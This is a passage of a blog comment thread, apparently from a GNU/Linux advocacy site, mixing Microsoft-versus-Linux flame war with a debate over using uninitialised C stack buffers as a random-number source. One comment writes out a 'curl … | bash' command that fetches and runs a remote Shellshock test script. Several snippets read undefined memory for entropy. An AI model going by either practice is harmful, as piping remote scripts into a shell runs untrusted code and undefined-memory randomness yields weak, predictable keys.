    Just as the first possible Linux security flaw that springs to mind in these circumstances.

  81. dougman says:

    Win-Doh trolls make big issues over Linux server malware, but how many consumers actually run servers? I say 1%, perhaps even less, so for the majority of people it is a non-issue, but in the world of Microsoft what affects the desktop also does the server.

    Linux malware isn’t new, but for one reason or another it never seems to spread far, why is that?

  82. DrLoser wrote, “Finally Linux is about to acquire a proper modern development environment to replace all that ancient Java rubbish.”

    They both look like rubbish to me. BTW, what’s the licence? Open Source does not necessarily mean Free Software.

    This could be good news if it allows applications written for that other OS to be ported easily to GNU/Linux. I don’t know any that are however. Is PhotoShop?

  83. DrLoser says:

    Speaking of FLOSS loonies working for M$, btw, have y’all checked out the breaking news?

    That’s right. Finally Linux is about to acquire a proper modern development environment to replace all that ancient Java rubbish. All thanks to Microsoft and their unceasing commitment to FLOSS!

    Dot Net FTW!

  84. DrLoser says:

    Heartbleed, ah the tricky one, you also left out that is is a Win-Dohs problem too, but lets not overlook the facts eh? Again, this is a communication bug for servers.

    Are there any “facts” to overlook, Dougie? Significantly, despite the clear fact that you tend to go a bit spare and link indiscrimately to sites of dubious relevance … a bit like oiaohm, but thankfully with less pretensions to credibility … you missed the chance to link on this one.

    Here, I’ll help you out.

    No guarantee that M$ is not also vulnerable to Heartbleed, of course. You’d be surprised how many FLOSS loonies there are, working for M$.

    But, no. Heartbleed is fairly obviously a Linux security flaw.

  85. DrLoser says:

    Synopsis: if you’re not running a server, then you have nothing to worry about.

    To be strictly accurate, Dougie, a Linux server. But what the heck, I’ll give you that. 40% of the Web Server market goes blooey, no cat dies, old news, wrap fish and chips in it and be done.

    Apart from the fact that an unknown number of miscreants (if I may demean, say, the Russian Mafias with this term) might very well have used ShellShock — and I assume you know, Dougie, what a CVE refers to; there are six by your count — as a long-term investment.

    I’m not for a moment suggesting that any security hole on any OS is immune to this. I’m merely suggesting that ShellShock is a poster child for such things, given the mechanism involved.

  86. dougman says:

    “Because none of us are going to make our work harder by throwing away one environment for another…”

    OLDman, delusional, feeble and narrow-minded, for someone that *supposedly* uses RedHat, you refuse to admit the benefits of Linux. There is nothing to see here, move along!

    LOLz…

    Ok, lets investigate his mentioning of Shellshock and Heartbleed.

    Shellshock, is a problem for servers, but eh, one can test for it anyways for sh1ts and giggles.

    curl https://shellshocker.net/shellshock_test.sh | bash
    % Total % Received % Xferd Average Speed Time Time Time Current
    Dload Upload Total Spent Left Speed
    100 2627 100 2627 0 0 7197 0 –:–:– –:–:– –:–:– 7217
    CVE-2014-6271 (original shellshock): not vulnerable
    CVE-2014-6277 (segfault): not vulnerable
    CVE-2014-6278 (Florian’s patch): not vulnerable
    CVE-2014-7169 (taviso bug): not vulnerable
    CVE-2014-7186 (redir_stack bug): not vulnerable
    CVE-2014-7187 (nested loops off by one): not vulnerable

    Synopsis: if you’re not running a server, then you have nothing to worry about.

    Heartbleed, ah the tricky one, you also left out that is is a Win-Dohs problem too, but lets not overlook the facts eh? Again, this is a communication bug for servers.

    Synopsis: if you’re not running a server, then you have nothing to worry about.

    Meanwhile, back to bashing MicroSh1t. The opponents to the M$ monopoly is slowly whittling it down to nothing, who would have thought that M$ would be selling low-cost products to compete, then giving away major upgrades and software for peanuts? The answer lies in the fact that competition is bypassing Windows and M$ is having to catch-up, by lower prices for consumer and business products.

    And look at this:

    http://www.wired.com/2014/11/microsoft-open-sources-net-says-will-run-linux-mac/

    Wow, I bet the anti-FOSS trolls that come here did not see that one!

    Here is another..

    “Not so long ago, Microsoft execs told customers they could count on the company to deliver first and best on Windows. But in the new, platform-neutral Microsoft — where new apps and services increasingly appear on iOS and Android before Windows or Windows phones — why should users bet on Windows?”

    “It’s almost as if Microsoft — which has a history of over-correcting when it makes a wrong turn (see making Windows Phone a consumer platform without enterprise support for years, for just one example) — is so intent on proving it’s not the Windows company any more that it’s leaving Windows users out to dry.”

    http://www.zdnet.com/with-a-new-platform-neutral-microsoft-why-go-windows-7000035720/

    Repeat after me.. SERVICES… SERVICES… SERVICES… SERVICES… SERVICES… SERVICES…

  87. DrLoser wrote, “you and Robert persist in thinking that a tiny arbitrary number like 100 is anything like as useful a sample”.

    I made no comment at all about the merits of 100 v 4095. My comment was about getting stuff off the stack v asking the operating system for memory. Obviously, if you seek data, random or not, more is usually better. Don’t take things out of context like that. It’s rude, abrasive, and often wrong, but I’m sure it’s in the Troll’s Rule-book.

  88. olderman wrote, “none of us are going to make our work harder by throwing away one environment for another”

    That’s not true. Millions are migrating to GNU/Linux one way or another: buying PCs with GNU/Linux or ChromeOS or Android/Linux or installing the software as needed. Of course not everyone will do that but many will because they are fed up with the high cost of Wintel, malware, endless re-re-reboots or BSODS, whatever…

    I was just reading about the City of Toulouse in France. They have a lot of GNU/Linux on servers, FLOSS on desktops and they are considering GNU/Linux on desktops. They did not do that to increase their work load but to get more done with less. Toulouse is quite pragmatic and not FLOSSies at all. They changed their work environment and it did not make more work for them.
    “Software licenses for productivity suites cost Toulouse 1.8 million euro every three years. Migration cost us about 800,000 euro, due partly to some developments. One million euro has actually been saved in the first three years. It is a compelling proof in the actual context of local public finance” So, it paid Toulouse to switch. The French National Police started with OpenOffice.org and then migrated thousands of desktops to GNU/Linux. They saved 40% of the cost of PCs.

  89. DrLoser says:

    1000 is extreme wishful thinking That Exploit guy.

    And yet you and Robert persist in thinking that a tiny arbitrary number like 100 is anything like as useful a sample as, say, the default (stock) Linux page size — both bigger and a better choice in any case.

    It’s one or the other, oiaohm. You can’t win on both counts.

    Non zero is not your only consideration creating a random number generator source. The constant pattern where lots in the 4kb are pairs results in a large percentage of the numbers canceling themselves out.

    So what? TEG kindly pointed out that he was expecting “less than 1000” nonzero octets. Even a hundred is more than you’re going to see with your own feeble effort. And only paired octets will cancel each other out in an XOR.

    All of which is irrelevant, because TEG’s sample code is not intended to provide a high-quality random number generator, just to disprove your foolish assertion that stock Debian zeros or dead-beefs memory without any such requirement by the programmer.

    If you’re worried about repeated octets cancelling themselves out, btw, may I recommend the following?

    n^32 + n^26 + n^23 + n^22 + n^16 + n^12 + n^11 + n^10 + n^8 + n^7 + n^5 + n^4 + n^2 + n + 1

    It’s completely off-topic from TEG’s successful demonstration that you don’t have a clue what you’re talking about, oiaohm, but it does demonstrate that you can get a perfectly serviceable amount of entropy out of a random Linux memory page.

    It’s also computationally ridiculously cheap.

  90. dougman wrote, “Microsoft fixes ’19-year-old’ bug with emergency patch”.

    This situation is so extreme yet folks like olderman accept it… Consider these issues:

    • The bug was reported to M$ back in 2014-May, yet it took months to fix something so critical. That’s a symptom of some disarray in M$. Are they short of staff? Does every bug have too many effects? Do they care?
    • There are hundreds of millions of XP-machines out there, all using IE-whatever with this bug available via IE and VBscript. Are we about to see the largest super-computer controlled by bad guys ever?
    • M$ has publicly admitted that they shipped software with zero security back in the Lose ‘9x days. WHY ARE THEY STILL USING THAT CODE?

    I think governments should issue an order for a safety recall of all M$’s products. Now.

  91. olderman says:

    “19 years??..LOLz”

    Laugh all you want Dougie, It will get fixed, just like shellshock and heartbleed get fixed, and we all go on from there.

    Because none of us are going to make our work harder by throwing away one environment for another, especially one that has its own warts and issues for many.

  92. dougman says:

    19 years??..LOLz

    Microsoft fixes ’19-year-old’ bug with emergency patch

    http://www.bbc.com/news/technology-30019976

  93. oiaohm says:

    That Exploit Guy
    Even with the length of buf set to 4095, there a good chance you’ll get less than 1000 non-zero values. Next time you arbitrarily change something in a piece of code, try and understand why it is the way it is first.
    Just because the value is non-zero does not mean it doing anything useful for the result.
    On Linux 150 unique values in the first 4kb. Demoed by the following code that shows the unique value count. Yes 150 or less always in unique values and that is not allowing for the constant values that should be filtered out.

    1000 is extreme wishful thinking That Exploit guy. Non zero is not your only consideration creating a random number generator source. The constant pattern where lots in the 4kb are pairs results in a large percentage of the numbers canceling themselves out. Random from the unique values is far more random than your first code yet its not good.
    #include
    #include /* strcat */
    #include /* strtol */
    int cmpfunc (const void * a, const void * b)
    {
    unsigned int x, y;
    x=*(unsigned int*)a;
    y=*(unsigned int*)b;
    if(x > y)
    return 1;
    else
    return(x <y) ? -1: 0;
    }
    int main() {
    int i;
    // unsigned int buffer[0xFFF];
    unsigned int buf[0xFFF], result = 0;
    unsigned int n,l;

    printf("result %x\n",n);
    qsort(buf, 0xFFF, sizeof(unsigned int), cmpfunc);
    result ^= buf[0];
    n=0;
    for (i = 1; i < 0xFFF; i++)
    {
    if ( buf[i-1]!=buf[i] ) {
    n++;
    printf("randomlist %i %i,%x\n",n,i, buf[i]);
    result ^= buf[i];
    }
    }

    printf("test %i\n", result);
    return 0;
    }

    You are looking in the first 4kb it is well under 150 random numbers being used if you xor the 4kb. Remember xor operation applying the same number twice is a no operation result so yep your code Exploit Guy threw away a good percentage of the 150. Really my code that is showing 150 is being optimistic to the extreme. You never filtered the buffer Exploit Guy.

    There are reasons why I say you cannot write a random number generator to save your ass Exploit Guy. A proper random generator from a buffer is not just a xor. Just an xor could end up throwing out all the random so get down to locked value a lot more simply.

    You want 1000 source random numbers use the OS random number generator with user input and other generation methods.

  94. oiaohm says:

    That also has the effect of reducing the entropy collected by buf.
    To be correct at 100 size it is always broken. There is always some stuck bits under Linux.
    ASLR concerns addresses in the virtual memory space. It has fundamentally nothing to do with junk data collected from physical memory.
    Except the buffer has not come from random physical memory. The buffer comes from application already allocated memory. Operations performed before main runs. The random values in there are in fact pointers and remains of data structure the program prior used.

    Exploit guy its worse than “1000 non-zero values”. Remember you are doing xor. Every pair of identical values results in a nop. Yes you might have 1000 non-zero values that are randomize but due to the fact they could just happen to be in all pairs the result is a jammed random. Nothing in your code example is checking for the possibility of being jammed.

    Deaf Spy 4095 is coming from somewhere but its not what you think.
    #include
    #include /* strcat */
    #include /* strtol */

    int main() {
    int i;
    unsigned int buffer [0xFFF];
    unsigned int buf[0xFFF], result = 0;
    buffer[0]=0;
    for (i = 0; i < 100; i++)
    {
    printf("randomlist %i,%x\n",i, buf[i]);
    result ^= buf[i];
    }

    printf("test %x\n", result);
    return 0;
    }
    Notice in my code example here programmer made a error and declared buf twice the result is completely broken and stuck on 0. This example here is always zero on debian Linux and every other Linux. This is a direct demonstration of a problem. As the program gets more complex this kind of random is more likely to be screwed up.

    4Kb is used in Application setup by crt0.o from linker used. There is absolutely no point using a value large than 4KB as the every other part of the stack is all zeros. The only reason there is any random data is the start up code crt0 before main runs did not clean up after itself and address space randomization is on and the application did not run in an exact order. Yes the int i that I copied from Exploit Guy code is in the wrong place because it has destroyed 1 possible random value. init of i should have been in the for loop to give the most number of possible random value.

    4KB is coming from crt0 that was linked into the executable binary. A hardened version of crt0 will clean up after itself. Then at the start of main everything in stack will be zeros or 4kb of 0xdeadbeaf followed by all zeros depending on how crt0 was configured to clean up after itself.

    Random from a buffer is depending on behavior outside your control. Safer to call the OS proper random functions.

    This is why exploit guy code only appears to work. Using buffer for random on Linux is a very quick way to run into a lot of trouble. Remember gcc has more than one Crt0 same with LLVM. So Exploit guy is betting that the complier will play along. Not future safe code Exploit guy as linkers are free to change how Crt0 operates at any time.

    That Exploit Guy you claim to understand exploits. I though the first 100 values and their layout would trigger you to wake up what your so called random source was. Yes it reading the left overs of Crt0. Yes their are hardened forms of Crt0 that don't leave behind this. 1 minor coder error declaring something in the wrong and it also jams. No comments in Exploit code to say don't declare anything before the buffer.

    Random from undefined buffer is extremely bad idea. On Linux almost always has a calculable defined value shape or filled with zeros/oxdeadbeaf(so not work at all ).

    Notice that Exploit guys code is so platform Dependant its not funny. Always hate coders who say hey this works it fine when it comes to security. Those are the ones who don't do the homework to see what is going on under the hood.

  95. dougman wrote, of M$’s patching, “increasing.”

    That’s not necessarily a bad thing. It could be reasonable in proportion to the size of the codebase and number of versions supported. Let’s see: XP, 2003, 2008, 2010, Vista, Vista 2, “8” and “8.1” and “10” all being supported simultaneously. M$ is literally forking itself. Then there’s the code-bloat… and software designed for the unique and new gadgets. At the same time M$ is cutting staff. I think they are spreading themselves thinly.

  96. dougman says:

    http://www.tomsguide.com/us/microsoft-biggest-patch-tuesday,news-19893.html

    It seems to me, that in reality the amount of overall patches for Windows, is increasing.

  97. That Exploit Guy says:

    This is me posting from my brand-new Windows 10 VM.

    @Dead Spy

    Sorry to step in, gentlemen, but I can’t resist.

    Thanks for nothing.

    @Olderman

    how about recompiling with TEG’s original 4095?

    Thanks also for absolutely nothing.

    @Robert Pogson

    This is TEG essentially being unfair.

    No, and you know I am not. Of course, an argument between Peter Dolding and the “trolls” just cannot be complete without you lamely and stubbornly defending him, can it?

    100 and 4095 are both arbitrary values, one arbitrarily larger than the other.

    And I have already given my explanation as to why I have chosen the larger value, and it is entirely your conscious decision to completely ignore that explanation.

    There’s absolutely nothing wrong with oiaohm’s choice. He could have argued it should be larger.

    He could have, but he did not.

    Rather than accusing me of being unfair, why not spend a bit of your sweet time asking Dolding why he thought it was a good idea to cut down the size of buf to 100 instead of use a spreadsheet to tabulate the value of each element like everyone else would?

    What would your argument have been then, that he was wasteful?

    Again, it is hardly my fault that you have chosen to completely ignore what I have said about the size of buf.

    That’s also unfair. ASLR affects the mapping from virtual to physical space.

    No. This is not to mention the Wikipedia article you have cited does not justify even one bit of your above argument.

    By the way, why do I have a feeling you are just going to fall silent on this subject matter and instead let Dolding fluff a giant wall of text, which you will neither acknowledge nor deny. After all, isn’t that why you are keeping him around – to tell lies about things (especially on Microsoft-related subjects) while maintaining a layer of deniability?

    This is not oiaohm’s code. It’s TEG’s.

    If you want Dolding’s code, it’s right herein this post. Was your selective blindness acting up again, eh?

    Popping something off the stack by the compiler is not the same as making a system call for storage.

    Irrelevant, unless, of course, you are suggesting that Dolding’s code somehow makes “a system call for storage” for buf, which it clearly doesn’t.

    Both 100 or 4095 units of storage may come from a heap that has or has not been sliced and diced by other software/hardware and the code in question has nothing to do with how that storage was allocated.

    I like how this completely contradicts the preceding statement by stating outright that whether the memory is dynamically allocated has nothing to do with the entropy within.

    So, now what? Should we give a toss about whether there is “a system call for storage” in the code or not? Make up your mind.

    It has nothing to do with the size/quality of the stack/heap. It has nothing to do with what libraries will be linked or what OS will run the code.

    So are you saying that Dolding is wrong on the issue regarding 0x00000000/0xdeadbeef/glibc?

  98. Hey! The trolls are kind of quiet today. It’s Patch Tuesday, and I suppose they are busy plugging holes in their IT.

  99. olderman wrote, “how about recompiling with TEG’s original 4095?”

    1:junk.c **** #include "stdio.h"
    2:junk.c **** int main() {
    15 .loc 1 2 0
    16 .cfi_startproc
    17 0000 55 pushq %rbp
    18 .cfi_def_cfa_offset 16
    19 .cfi_offset 6, -16
    20 0001 4889E5 movq %rsp, %rbp
    21 .cfi_def_cfa_register 6
    22 0004 4881EC10 subq $16400, %rsp

    Just a different constant in line 22 of the listing.

  100. olderman says:

    “There’s no malloc or such here. It’s all from the stack.”

    how about recompiling with TEG’s original 4095?

  101. Deaf Spy wrote, “ASLR affects only the virtual addresses.”

    The virtual addresses are mapped to physical addresses so changing the virtual address changes the physical address. Don’t be so literal. Combined with tunnel-vision, it’s a waste of our time.

    Deaf Spy wrote, “This buffer is not on the stack.”

    1:junk.c **** #include "stdio.h"
    2:junk.c **** int main() {
    15 .loc 1 2 0
    16 .cfi_startproc
    17 0000 55 pushq %rbp
    18 .cfi_def_cfa_offset 16
    19 .cfi_offset 6, -16
    20 0001 4889E5 movq %rsp, %rbp
    21 .cfi_def_cfa_register 6
    22 0004 4881ECA0 subq $416, %rsp
    22 010000
    3:junk.c **** int i;
    4:junk.c **** unsigned int buf[100], result = 0;
    23 .loc 1 4 0
    24 000b C745F800 movl $0, -8(%rbp)
    24 000000
    5:junk.c **** for (i = 0; i < 100; i++) 25 .loc 1 5 0 26 0012 C745FC00 movl $0, -4(%rbp) 26 000000 27 0019 EB33 jmp .L2 28

    There's no malloc or such here. It's all from the stack.

  102. Deaf Spy says:

    Sorry to step in, gentlemen, but I can’t resist.

    100 and 4095 are both arbitrary values, one arbitrarily larger than the other.
    No, 4095 is absolutely not arbitrary. Hints page size, data alignment, physical memory allocation.

    ASLR affects the mapping from virtual to physical space.
    No, it absolutely doesn’t. ASLR affects only the virtual addresses. Period. How virtual addresses are mapped to physical space is a completely different matter, and is handled by the MM of the OS, and ASLR has nothing to do with it.

    This is not oiaohm’s code. It’s TEG’s.
    We’re talking about oiaohm’s claims here, Pogson. He brought up the myth about 0xdeadbeef and 0x00000000. Neither the OS in question, nor glibc aut-initialize data buffers with these values.

    Popping something off the stack by the compiler
    This buffer is not on the stack.

    It has nothing to do with the size/quality of the stack/heap.
    It has, it has, see above.

    Pogson, are you sure you pick your allies wisely?

  103. TEG wrote, “Even with the length of buf set to 4095, there a good chance you’ll get less than 1000 non-zero values. Next time you arbitrarily change something in a piece of code, try and understand why it is the way it is first.”

    This is TEG essentially being unfair. 100 and 4095 are both arbitrary values, one arbitrarily larger than the other. There’s absolutely nothing wrong with oiaohm’s choice. He could have argued it should be larger. What would your argument have been then, that he was wasteful?

    Similarly, TEG wrote, “ASLR concerns addresses in the virtual memory space. It has fundamentally nothing to do with junk data collected from physical memory.”

    That’s also unfair. ASLR affects the mapping from virtual to physical space. A random mapping is still a mapping. A contiguous buffer will likely be contiguous in physical space as well.

    Further, TEG wrote, “there was no 0xdeadbeef, no 0x00000000, or any funny business that you claimed the Linux kernel/GCC/glibc would do.”

    This is not oiaohm’s code. It’s TEG’s. Popping something off the stack by the compiler is not the same as making a system call for storage. Both 100 or 4095 units of storage may come from a heap that has or has not been sliced and diced by other software/hardware and the code in question has nothing to do with how that storage was allocated. It has nothing to do with the size/quality of the stack/heap. It has nothing to do with what libraries will be linked or what OS will run the code.

  104. That Exploit Guy says:

    Yes I have reduced the buffer size but that is for practical reasons that 100 is simpler for a human to compare by eye.

    That also has the effect of reducing the entropy collected by buf.

    Besides, if you want to “compare by eye” the values in buf, use a spreadsheet.

    That Exploit Guy run this form the program. This is a true check of random data source version.

    No, that’s just printing out values from buf, with a sample size of 100.

    Notice how many ever without me tweaking anything of buf[i] are basically constant values every time the program is run.

    Even with the length of buf set to 4095, there a good chance you’ll get less than 1000 non-zero values. Next time you arbitrarily change something in a piece of code, try and understand why it is the way it is first.

    The reality is your random number generator is generating from address the Linux kernel address randomization created.

    ASLR concerns addresses in the virtual memory space. It has fundamentally nothing to do with junk data collected from physical memory.

    That Exploit Guy you have not checked your random source to see what it is.

    I have. How do you think I have come up 4095 as the size for buf?

    Libraries and Applications are a lot more complex. This brings hell. The more complex the code the more chances the complier will optimize to a state your undefined array source so it is completely jammed to a defined state.

    Again, you have completely failed to show any evidence of why this can be the case.

    Sure, it is entirely possible that, seeing buf as being uninitialised, some compilers may attempt to optimise out result =^ buf[I] and cause result to always remain 0, but I doubt this is the case for GCC.

    For the sake of thoroughness, I have already tried the code with a non-GCC compiler before posting it here. No such optimisation was observed, either.

    Also, there was no 0xdeadbeef, no 0x00000000, or any funny business that you claimed the Linux kernel/GCC/glibc would do.

    You, sir, are truly full of crap, aren’t you?

  105. DrLoser quoth, “Dulce et decorum est…”

    There’s nothing good coming from industrial grade slaughter. My father was involved in WWII which on the military front was much more civilized than WWI and he had nightmares for 15 years afterwards. The foot-soldiers had it worse in WWI but civilians paid a much higher price in WWII. Somehow the gene-pool keeps producing folks who don’t learn from history. e.g. Iran (?), Israel (?), N. Korea, India, Pakistan, Russia, China, USA, UK, FR, … all possessing nukes. e.g. USA spending more on “offence” than anyone else yet not being able to afford universal education/medicare. I don’t celebrate any military no matter how much courage/skill/technology they demonstrate. It’s all a waste until it becomes necessary.

  106. oiaohm wrote, ” This is a true check of random data source version. Notice how many ever without me tweaking anything of buf[i] are basically constant values every time the program is run. Turn off address randomization and result can be no variation at all. ”

    That’s pretty weak. In fact, in a multi-user/multi-process environment, running an application multiple time can give different garbage in an uninitialized buffer from time to time. Spies count on that to skim through the garbage in RAM/storage. They can also spawn processes to gradually use up RAM so stuff loads over a wide area. No method will zero the risks. All we can do is minimize them by various techniques. I like to deliberately initialize stuff in the code. We should also wipe data before releasing storage/RAM. PASCAL and other compilers warn about uninitialized variables. Operating systems can do a lot of good with /dev/zero, /dev/random, etc. but folks who are really serious will use a hardware random number generator using something static/hissy/noisy and digitizing it. It is expensive however to get the bandwidth/throughput needed in larger systems so compromises must be made. Combining multiple pseudo-random sources is about the best we can do. In the old days a noisy diode was good enough but it was hard to get even 1 MB/s of junk. Modern PCs may need a lot more if you are going to wipe buffers with anything but zeros or ones. Then there’s the residue of data in storage…

  107. oiaohm says:

    That Exploit Guy run this modified version of your example. Yes I have reduced the buffer size but that is for practical reasons that 100 is simpler for a human to compare by eye.
    #include
    int main() {
    int i;
    unsigned int buf[100], result = 0;
    for (i = 0; i < 100; i++)
    {
    printf("randomlist %i,%x\n",i, buf[i]);
    result ^= buf[i];
    }
    printf("test %x\n", result);
    return 0;
    }

    That Exploit Guy run this form the program. This is a true check of random data source version. Notice how many ever without me tweaking anything of buf[i] are basically constant values every time the program is run. Turn off address randomization and result can be no variation at all. NoMMU routers and printer of course don't have address randomization hello source of huge number of matching SSL public keys. By the way turning off address randomization under Linux is a performance tweak at the cost of security. Yes due to items like Openssl using undefined buffers the cost is a little higher than it should be.

    The reality is your random number generator is generating from address the Linux kernel address randomization created. Little issue Linux Address Space randomization will not give you every value either. So you random number source entropy is not 32 bits.

    Undefined is not trust-able to be random data Undefined can be defined. In fact a large percentage of the undefined you are using is defined by the complier when the program is built. Is it possible that your full 0xfff range by complier optimization be just a block of all 0 and be all 0 every time the program runs. O yes it is and this is without me tweaking a single flag. Its just a case of complier going the wrong way when optimizing.

    Undefined is not random. Undefined has a horible habit of becoming defined if you don't notice you are in so much trouble its not funny.

    That Exploit Guy you have not checked your random source to see what it is. It is critical to check how much of your random source is truly random.

    Remember your example is simple. Libraries and Applications are a lot more complex. This brings hell. The more complex the code the more chances the complier will optimize to a state your undefined array source so it is completely jammed to a defined state.

    That Exploit Guy only a idiot disobeys the C standard that tells you that should never depend on anything undefined working for you. Problem is a idiot who does not follow the C standard recommendations got to the head of the OpenSSL project and goes ahead and claims using a undefined is ok. This is something that TMR guys could possibly do good with. Its a pure myth that undefined is random. The myth causes a stack of security flaws.

  108. DrLoser says:

    Still, and in muted celebration of our Canadian cousins (amongst so may who gave their lives 100 years ago, and since we are very close to the Last Post of All Last Posts):

    Let us all, on each and every side of the software divide, raise a cup to the fallen.

    Dulce et decorum est…

  109. DrLoser says:

    Whether or not a person has some flaw is not relevant. I want decorum here. It’s neither necessary nor desirable to discuss the flaws of individuals here. Stick to the technology/personal experience/opinion/logic etc.

    In passing, it’s a little too late to ask for decorum when you allow oiaohm to call every single person who disagrees with him (sometimes on unimpeachably factual grounds) an idiot.

    And Dougie and I seem to be able to trade extremely indecorous insults without edits. (I am fairly sure that Dougie will agree with me that this is a Good Thing.)

    I’m intrigued, though. A whole post effectively censored because of an ad hominem attack? That doesn’t sound much like Deaf Spy. Sounds a whole lot more like me, for example … I’m a Brummie, I like to use four letter words (and I’m trying to suppress that for the purposes of writing to this site).

    Surely there was some content to that post that you didn’t need to censor?

    I mean, paranoia works both ways, you know.

    Perhaps that redaction is simply there because you cannot stand the fact that TEG is obviously correct?

  110. dougman quoth, “the hackers were able to jump the barriers between a peripheral third-party vendor system and the company’s more secure main computer network by exploiting a vulnerability in Microsoft Corp. ’s Windows operating system”.

    More likely, as many vulnerabilities as they needed. Malware-writers have books full of exploits of that other OS. Security was bad enough a decade ago with that other OS but for some it takes an incident like this to wake up.

  111. dougman wrote, “rebooting and to patch itself, so it could reboot better”.

    Yep, there’s a basic problem with all the complexity bred to lock-in users. That complexity doesn’t scale. It’s reached the point where not even M$ can care for its own bloatware.

  112. dougman says:

    I still am laughing at the fact that they are looking to Apple products now…LOL.

    “the hackers were able to jump the barriers between a peripheral third-party vendor system and the company’s more secure main computer network by exploiting a vulnerability in Microsoft Corp. ’s Windows operating system, the people briefed on the investigation said.

    Microsoft issued a patch after the breach began, and Home Depot installed it, but the fix came too late, the people added. Afforded such access, the hackers were able to move throughout Home Depot’s systems and over to the company’s point-of-sale systems as if they were Home Depot employees with high-level permissions, the people said. Microsoft declined to comment.”

    Of course M$ would refuse to comment..LOLz….

    http://hothardware.com/News/Home-Depot-Notes-Windows-Is-To-Blame-For-Massive-Security-Breach/

    http://online.wsj.com/articles/home-depot-hackers-used-password-stolen-from-vendor-1415309282

    http://www.imore.com/home-depot-switches-execs-iphones-macbooks-it-blames-windows-massive-breach

  113. dougman says:

    Oldman sayeth: “The fact that a group of users do not “like” Linux or do not “feel it is necessary” simply doesn’t cut it in terms of the real functional capabilities.”

    I say Amen to that.

  114. dougman says:

    Problems are mounting for MicroSh1t, pushing out questionable updates will be their downfall.

    “Microsoft’s impending obsolescence is caused by its failure to grasp its own increasing irrelevance – a prominent Microsoft MVP and listserv moderator, Susan Bradley, wrote a letter to Steve Ballmer asking him to look into why Microsoft released obviously broken patches and updates as part of this month’s Patch Tuesday. Ordinarily, this would be small potatoes — except it’s the third month in a row that Microsoft has released major security fixes or features, then yanked them within hours or days. The problems at Microsoft run deeper than bad patches — even multiple bad patches in a row. To date, nothing the company has done or said, including getting rid of Ballmer, has spoken to the underlying problem.”

    “All 3 of my own Win2008R2SP1 servers got stuck in a triple auto-reboot Windows Update Failure this morning. All had 16 updates… They did eventually recover after 2 or 3 auto-rollback reboots… Checking updates on them all now shows this one still to install: Security Update for Windows Server 2008 R2 x64 Edition”

    http://www.infoworld.com/article/2834535/security/four-more-botched-black-tuesday-patches-kb-3000061-kb-2984972-kb-2949927-and-kb-2995388.html

    Look at the treasure trove of comments:

    – It took me 45 minutes to make my laptop functional again after the last batch of updates. Windows could not load properly. Apparently they could not all update at once.

    – I had to remove the contents of the registry folder..

    and the best for last,

    – I’m caught in a never-ending loop after installing the latest updates. The computer goes back and forth between a ” Starting Windows” screen and the Dell XPS Studio logo screen. This started around 8 PM last night and is still going strong 15 hours later. Any way to fix this?

    I am guessing the M$ functionality of rebooting and to patch itself, so it could reboot better. LOLz…

  115. olderman wrote, “A truth that Robert Pogson can’t handle is censored.”

    Whether or not a person has some flaw is not relevant. I want decorum here. It’s neither necessary nor desirable to discuss the flaws of individuals here. Stick to the technology/personal experience/opinion/logic etc.

  116. olderman says:

    “[AD HOMINEM ATTACK REMOVED – rp]”
    Nope.

    A truth that Robert Pogson can’t handle is censored.

  117. dougman wrote, “had to rewrite their graduating thesis over a weekend”.

    That brings back horrible memories. In the pre-PC age, it took me a year to write my thesis and a week on a typewriter for a pro to type it up. Having that other OS eat it would have caused a lot of anguish which was already plentiful. I’ve seen students in tears when that other OS ate their assignments. That inspired me to convert my first lab… Instead of a daily occurrence we went months with no one losing any data.

  118. dougman says:

    The arrogance of M$ MVP’s is funny, but sad.

    http://answers.microsoft.com/en-us/windows/forum/windows8_1-windows_update/windows-81-is-malware/c7ff95fe-5cb8-4677-8fa2-41793597a70d

    Some dude is upset that Windows updated AUTOMATICALLY then restarted/rebooted his computer, sans his consent. The MVP’s show him some snapshot, but it does not mention restarting/rebooting….LOLz.

    Another thread describing the failure in action…

    “Automatic updates on my girlfriends windows 8 laptop were turned on without her consent, my girlfriend is smart and never just clicks things so I know she didn’t cause this. After a few days and some auto updates (annoying), she walks into class to find her pc mid upgrade to 8.1. How did the pc auto update to 8.1 when its supposed to be optional and ask permission. Since then her pc survived the 8.1 update but now forces updates and reboots. This has already cost her work. We have not been able to turn off updates in the menu. We select “check for updates and let me choose “then click ok. But, after you reboot its back to automatically install updates. We have tried every non- auto install option in the menu to no avail. Auto updates are stuck on. And after it has forced her to 8.1 you can imagine why she wants them off. Also a full re-install is out of the question shes in college and mid semester no chances can be taken. ”

    Believe or not I know someone that had to rewrite their graduating thesis over a weekend, as their laptop with “Wind-Dohs” crashed.

    Good thing that the EULA the consumers agreed to forbids class action lawsuits.

  119. Deaf Spy says:

    Get yourself a stock Debian install, tweak it to your heart’s content and then compile and run my program in it.
    [AD HOMINEM ATTACK REMOVED – rp]

  120. That Exploit Guy says:

    Exploit Guy did not set mallopt values so his code was defective to get random data in a glibc environment. Also address randomization is most of the source of the random data Exploit Guy is seeing yet no where in Exploit Guys code does he check that address randomization is on. Remember you can turn address randomization off again this is another stock feature that administrator can change. Yes Linux kernel address randomizer depends on the Linux kernel random number generator that has known bugs in virtual machines images.

    The problem with Exploit Guy code you can cripple it just by changing configuration options. Yes a stock Linux Distrobution fresh install Exploit Guy example code appears to work. The problem is admin can come along and change a few options and his code then does not work.

    You have already been asked once to prove your assertion through providing the outputs of the programs. Get yourself a stock Debian install, tweak it to your heart’s content and then compile and run my program in it.

    Even up until this point you have given exactly o piece of empirical evidence to support any of your claims, and I have already specifically told you to not give me “I know because I am oiaohm” BS, which is what exactly you are giving me right now.

    This is all very typical, isn’t it, that you write all kinds of CS-sounding fiction to impress people, and when someone asks you to prove your BS, you simply pretend no one has asked you anything and instead attempt to cover your BS with even more BS.

    So, what is now, Peter Dolding? Are you going to prove me wrong with outputs from my own code and settle the record once and for all, or are you just going to crap out another wall of nonsensical text knowing that all that you can possibly show me is stuff all?

    I eagerly await your reply.

  121. DrLoser says:

    Having said which, Robert, it’s only ten swiss francs, as I mentioned below.

    Why don’t you download it and give it a go? Munich will thank you for your FLOSS expertise.

  122. DrLoser says:

    Some of these, he explains, are very large organizations which use Kolab as a competitive advantage they do not wish their competitors to know about.

    Yup, that has the ring of truth about it.

    If I’m running WidgetCo with a typical SME turnover of say $5 to $50 million a year, the very last corporate advantage I want to give away is …

    … my choice of a unified email and calendaring system.

    That would be simply disastrous.

  123. DrLoser says:

    Oh, what a fool I was, Robert.

    Kolab claims many organizations are secretly using Kolab.

    Well, that should be good enough for anybody, shouldn’t it? Good Lord, actual proof is a footling thing in comparison.

